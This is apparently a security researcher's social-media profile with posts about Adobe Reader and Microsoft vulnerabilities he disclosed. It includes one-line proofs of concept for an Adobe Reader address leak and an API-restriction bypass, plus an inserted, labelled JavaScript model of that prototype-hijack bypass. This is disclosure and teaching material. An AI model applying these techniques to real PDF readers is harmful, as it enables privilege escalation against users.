AbdulAziz Hariri
Opinions expressed here are my own.
Earth
Joined July 2010
- One of the rare times that I've felt bad for killing a bug. An undocumented API that seems to have existed for ~13 years. CVE-2020-9697: Info disclosure in #Adobe Reader. PoC: var a = app.measureDialog(app); console.println("Escript Base: " + (Math.abs(a[1]) - 0x0044b43).toString(16))
- Microsoft patches are out. Two of my bugs (flagged critical), CVE-2020-1585 and CVE-2020-1560, were fixed.
- Adobe's CVE-2019-7041 is a cute typo (app.Priv instead of app.endPriv) in the folder-level JS that allows an API restrictions bypass. PoC: this.__proto__.app.Priv = [Privileged API] - It still requires a certain level of user interaction. This bug was found by @WanderingGlitch and me.
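Added example (not Adobe's code and not part of the post above): a small JavaScript model of the bypass the post describes. It assumes a privilege gate opened by beginPriv() and closed by endPriv(), a trusted folder-level script that misspells the closing call as Priv(), and an untrusted document script that can reach the shared object's prototype; the readSecret() API and the "s3cret" value are constructed for the demo and stand in for whatever privileged call an attacker would actually want.

```javascript
"use strict";

// Constructed model (not Adobe's code): a privilege-gated API object whose
// privileged section is opened by beginPriv() and closed by endPriv().
// The method names mirror the post; the secret is a placeholder.
function makeApp() {
  const proto = {
    _privileged: false,
    beginPriv() { this._privileged = true; },
    endPriv() { this._privileged = false; },
    // Privileged API: refuses to run unless a privileged section is open.
    readSecret() {
      if (!this._privileged) throw new Error("NotAllowedError: privileged API");
      return "s3cret"; // constructed placeholder value
    },
  };
  // Document scripts only see an object that inherits from this prototype,
  // so anything they add to the prototype is visible to trusted code too.
  return Object.create(proto);
}

// Trusted folder-level script as shipped: the closing call is misspelled.
function folderLevelWithTypo(app) {
  app.beginPriv();
  app.Priv(); // typo for app.endPriv(); the name resolves via the prototype chain
}

// Trusted folder-level script with the typo corrected.
function folderLevelFixed(app) {
  app.beginPriv();
  app.endPriv();
}

// Untrusted document script. It cannot call readSecret() directly, but it can
// define the misspelled name on the prototype (the post's this.__proto__.app.Priv)
// so the trusted script ends up calling attacker code while still privileged.
function attackerDocumentScript(app) {
  const state = { directCallBlocked: false, leaked: null };
  try { app.readSecret(); } catch (e) { state.directCallBlocked = true; }

  Object.getPrototypeOf(app).Priv = function () {
    state.leaked = this.readSecret(); // runs inside the open privileged section
    this.endPriv();                   // close it so the hijack leaves no trace
  };
  return state;
}

// Runs the vulnerable and the fixed script against the same document script
// and returns what the document script observed in each case.
function demo() {
  const typo = makeApp();
  const typoState = attackerDocumentScript(typo);
  folderLevelWithTypo(typo);

  const fixed = makeApp();
  const fixedState = attackerDocumentScript(fixed);
  folderLevelFixed(fixed);

  return {
    directCallBlocked: typoState.directCallBlocked, // true: the gate itself works
    leakedViaTypo: typoState.leaked,                // "s3cret": hook ran privileged
    leakedAfterFix: fixedState.leaked,              // null: Priv() is never called
    privilegedAfterFix: fixed._privileged,          // false: section closed properly
  };
}

console.log(demo());
```

The point the model makes is that the gate is not what fails: the direct call is still refused. What fails is that every name looked up inside the open privileged section is resolved through a prototype the untrusted script can write to, so a single misspelled identifier becomes an attacker-controlled call site. The fix is the one-character spelling correction, but the review check worth keeping is that trusted code running between beginPriv() and endPriv() calls nothing it does not own outright.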
- Adobe patches are out: helpx.adobe.com/security/produ…. Adobe patched five of my vulnerabilities: CVE-2020-9697, CVE-2020-9706, CVE-2020-9707, CVE-2020-9710, CVE-2020-9712.
- Excited to be presenting ‘Tackling Privilege Escalation with Offense and Defense’ with @EdgarPek at #BHEU in December: blackhat.com/eu-19/briefing…
- The full schedule for #Pwn2Own Vancouver is now available. We start tomorrow morning at 9:30 with @abdhariri targeting the #Adobe Reader for $50,000. Stay tuned for all the results. zerodayinitiative.com/blog/2024/3/19…
- Today marks my 10th year living in Canada. I’m fortunate to live in such a great country and proud to call myself a Canadian. Je t’aime Canada.
- This vulnerability is definitely one of the cutest (and weirdest) that I've found. Found it while researching new ways to bypass JS API restrictions in Adobe Reader. Will probably share more of the research later this year. zerodayinitiative.com/advisories/ZDI…